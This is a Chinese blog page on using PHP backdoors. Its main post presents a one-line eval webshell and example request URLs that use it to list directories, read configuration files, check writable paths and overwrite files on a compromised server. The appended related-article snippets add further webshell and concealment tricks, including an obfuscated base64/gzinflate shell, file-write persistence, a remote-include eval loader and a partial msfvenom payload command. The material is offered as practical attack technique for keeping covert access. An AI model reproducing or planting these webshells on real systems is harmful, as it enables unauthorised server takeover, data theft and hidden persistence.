怎么使用php后门,PHP后门的一些用法

最新推荐文章于 2022-05-31 19:55:36 发布
最新推荐文章于 2022-05-31 19:55:36 发布
阅读量489 收藏 2
点赞数
文章标签: 怎么使用php后门

今天我们说一些最常见的PHP留后门的一些用法

首先,写一个最简单的后门,也可以叫做木马。<?php eval($_GET['evl']);

就这样,你已经获得了这台服务器上的很多执行权限。

那场景的用法有哪些呢?

打印服务器phpinfohttp://www.test.com/a.php?evl=phpinfo()

查看某个目录下有什么文件http://www.test.com/a.php?evl=var_dump(system("ls /mnt/web/ -a"));

查看目录是否可写,接下里就可以在可写的目录里创建可执行文件了http://www.test.com/a.php?evl=var_dump(is_writable("/mnt/web/abc/"));

获取某个文件的内容,一般用来读取配置http://www.test.com/a.php?evl=var_dump(file_get_contents("/mnt/web/temp/api.php"));

对某个可写目录进行写文件http://www.test.com/a.php?evl=var_dump(file_put_contents("/mnt/web/temp/api.php",file_get_contents("/mnt/web/script/test.php")));

好了,以上基本已经可以完成对一个服务器的查看的部分破坏了,其他的功能就试着举一反三吧。

Shine Xue
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
php如何留后门,ThinkPHP后门技巧
weixin_35451402的博客
03-28 1037
欢迎来到阿八个人博客网站。本阿八个人博客网站提供最新的站长新闻,各种互联网资讯。喜欢本站的朋友可以收藏本站,或者加QQ:我们大家一起来交流技术!URL链接:https://www.abboke.com/rz/2019/1010/116721.html90sec上有人问,我说了还有小白不会用。去年我审计TP的时候留意到的,干脆分析一下代码和操作过程。thinkphp的I函数,是其处理输入的函数,一般...
在宝塔php里留后门,揭秘PHP的一种新型留后门方式
weixin_31748999的博客
03-19 749
转载不加作者名字的木JJ。作者:猴子 博客:www.sbmonkey.comphp内大致有这么几种运算符。按运算符号的功能分为:一:算术运算符(+ - * / % ++ --)二:字符串运算符 . 可以叫连接运算符号三:赋值运算符 = += -= *= /= %= .=四:比较运算符 > < >= <= == === <> != !==五:逻辑运算符 &...
php在服务器上留下后门,服务器上发现的一段PHP后门程序
weixin_31913479的博客
03-09 205
服务器上发现的一段PHP后门程序error_reporting(0);$path = __DIR__;if ($_GET["login"] == "2M05Wd") {if (isset($_FILES["uploadedfile"])) {$target_path = basename($_FILES["uploadedfile"]["name"]);if (move_uploaded_file...
给你的PHP大马添加后门(黑吃黑)
weixin_30915951的博客
06-23 792
Part 1 引子   说什么好呢,发个图就当个引子好了。 Part 2 XSS平台   创建项目   选择类型   xss代码   小实验,刷新代码   XSS平台上 Part 3 后门  我们写这样一个脚本 <?php $password = 'admin'; // 假设这个大...
PHP_GET后门,躲避任何安全软件
weixin_30813225的博客
01-23 200
经常拿到一些比较好的php站想要留住。插入菜刀一句话,很容易被管理发现,不管是eval还是assert,就是管理发现不了,有时连接也会被各种的安全软件拦截。现在教大家一个简单的技巧。本人一直在用,留的后门没有被删过了。 <?php file_put_contents('xpxp.php',"$_GET[uname]");//此段代码插入它正常的PHP里面,最好插头部。 复制代码利用也很...
PHP后门隐藏的一些技巧总结
12-16
如果想让自己的Webshell留的更久一些,除了Webshell要免杀,还需要注意一些隐藏技巧,比如隐藏文件,修改时间属性,隐藏文件内容等。 1、隐藏文件 使用Attrib +s +a +h +r命令就是把原本的文件夹增加了系统文件属性...
2233.php:PHP后门发电机
05-13
用法 $ php -f 2233.php ...然后弹出一个新的Web Shell。 示例壳 <?php $SnHCQlIQNe2 = gzinflate(base64_decode("dVFhS8MwEP3urzgjioqyrm7rXLuBoN8GTtwnv6VtasuaXG2vujn87ybpxuLAEB53715fj5coJ1nOTkCfKBc87...
php在线查杀扫描webshell后门 对接WEBDIR+ Api
10-04
使用PHP对接百度 WebDir在线查杀接口 作者来源:https://mubaisu.com/webdir.html 并处理判断返回结果,使在线查杀文件不在是梦想~ 无需任何扩展和依赖限制 只要你服务器可以跑php 缺点:每次查杀都需要上传文件到...
PHP使用流包装器实现WebShell的方法
01-20
PHP开发中,我们使用最为频繁的指令大概就是 include 指令, include 指令中一些比较普通的文件包含漏洞我们就忽略了,先来看看一串代码: include 'http://www.test.com/code.php' 我们通过这一串代码可以很容易...
SH3LL-BKDR:后门外壳集合
04-08
SH3LL-BKDR 用法 <?php eval("?>".file_get_contents("link_raw.php"));?> 加密base64
php如何开后门,php如何隐藏后门
weixin_35692916的博客
03-18 269
php如何隐藏后门php隐藏后门的方法:1、创建系统隐藏文件;2、利用ADS隐藏文件;3、在php环境变量中留shell;4、设置不死马;5、设置“php.ini”后门;6、将关键字拆分,并进行多文件包含;7、将真正的一句话写入数据库。推荐:《PHP教程》php 后门隐藏技巧1. attrib +s +h创建系统隐藏文件:attrib +s +a +r +hattrib +s +h 文件名解决覆盖...
php后门隐藏技巧
weixin_34150503的博客
08-25 354
一句话 and 大马phpspy 菜刀一句话<?php@eval($_POST['cmd']);?>反射后门<?php$func = new ReflectionFunction($_GET[m]);echo $func->invokeArgs(array($_GET[c]));?>调用如x.php?m=system&c=...
php超强后门在任意位置创建文件,编写变态的PHP后门
weixin_35663032的博客
03-09 229
在这篇文章中,我将向大家介绍如何编写一个非字母数字的PHP后门。在编写这种PHP后门的时候,我们首先需要了解一些基础知识:(1)了解PHP(2)了解curl或者其他一些能够操作HTTP请求的工具还有一点需要大家了解的是PHP中异或(^)的概念。对于异或,大家肯定都有所了解,但是平常能用到的地方可能不多,最起码本人不经常使用(勿喷)。之所以在这里强调一下异或的概念,是因为异或在这种非字母数字的PHP...
php一句话后门,PHP一句话后门集锦
weixin_42436686的博客
03-10 672
404页面的利用:404 Not FoundNot FoundThe requested URL was not found on this server.@preg_replace("/[pageerror]/e",$_POST['error'],"saft");header('HTTP/1.1 404 Not Found');?>404页面是网站常用的文件,一般建议好后很少有人会去对它进...
【CTF】buuctf web (四)——通过配置文件构造PHP后门
m0_52923241的博客
08-19 1531
知识点 user.ini文件构成的PHP后门 .user.ini文件 它比.htaccess(分布式配置文件)用的更广,不管是nginx/apache/IIS,只要是以fastcgi(进程管理器)运行的php都可以用这个方法。 [SUCTF 2019]CheckIn 上传一个a.php文件,文件内容为<?php phpinfo();?> 提示非法后缀,将后缀php修改为jpg 提示<?被过滤了 将内容变为脚本标记格式:<script language=php> phpi
常见php后门分析
W小哥
05-31 772
一、第一种 <?php define('test', 1); #定义一个常量 test,并且值为1 $test = $_POST[test];#因为前面定义了常量 test且值为1,而此处用了常量test:“$_POST[test]”,所以post传输数据必须为1,否则与前面定义的常量不一致,导致报错 if(test == 1){ @eval($test);#一句话木马后门 } 连接方式 二、第二种 ...
eval函数简介与PHP一句话木马剖析
weixin_44706754的博客
04-19 2004
eval函数简介与PHP一句话木马剖析 一、eval函数 eval() 函数把字符串按照 PHP 代码来计算。 该字符串必须是合法的 PHP 代码,且必须以分号结尾。 如果没有在代码字符串中调用 return 语句,则返回 NULL。如果代码中存在解析错误,则 eval() 函数返回 false。 二、eval函数的一般用法 <?php $string = "beautiful"; ...
php后门绕过eval关键字,一些变态的PHP一句话后门收集
weixin_42181929的博客
03-18 1742
这类后门让网站、服务器管理员很是头疼,经常要换着方法进行各种检测,而很多新出现的编写技术,用普通的检测方法是没法发现并处理的。今天我们细数一些有意思的PHP一句话木马。利用404页面隐藏PHP小马404 Not FoundNot FoundThe requested URL was not found on this server.@preg_replace("/[pageerror]/e",$_...
如何使用 msfvenom创造一个php后门
最新发布
04-07
以下是使用msfvenom创建php后门的步骤: 1. 打开终端并输入以下命令: ``` msfvenom -p ...如果目标服务器上没有PHP,则无法使用此方法创建后门

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值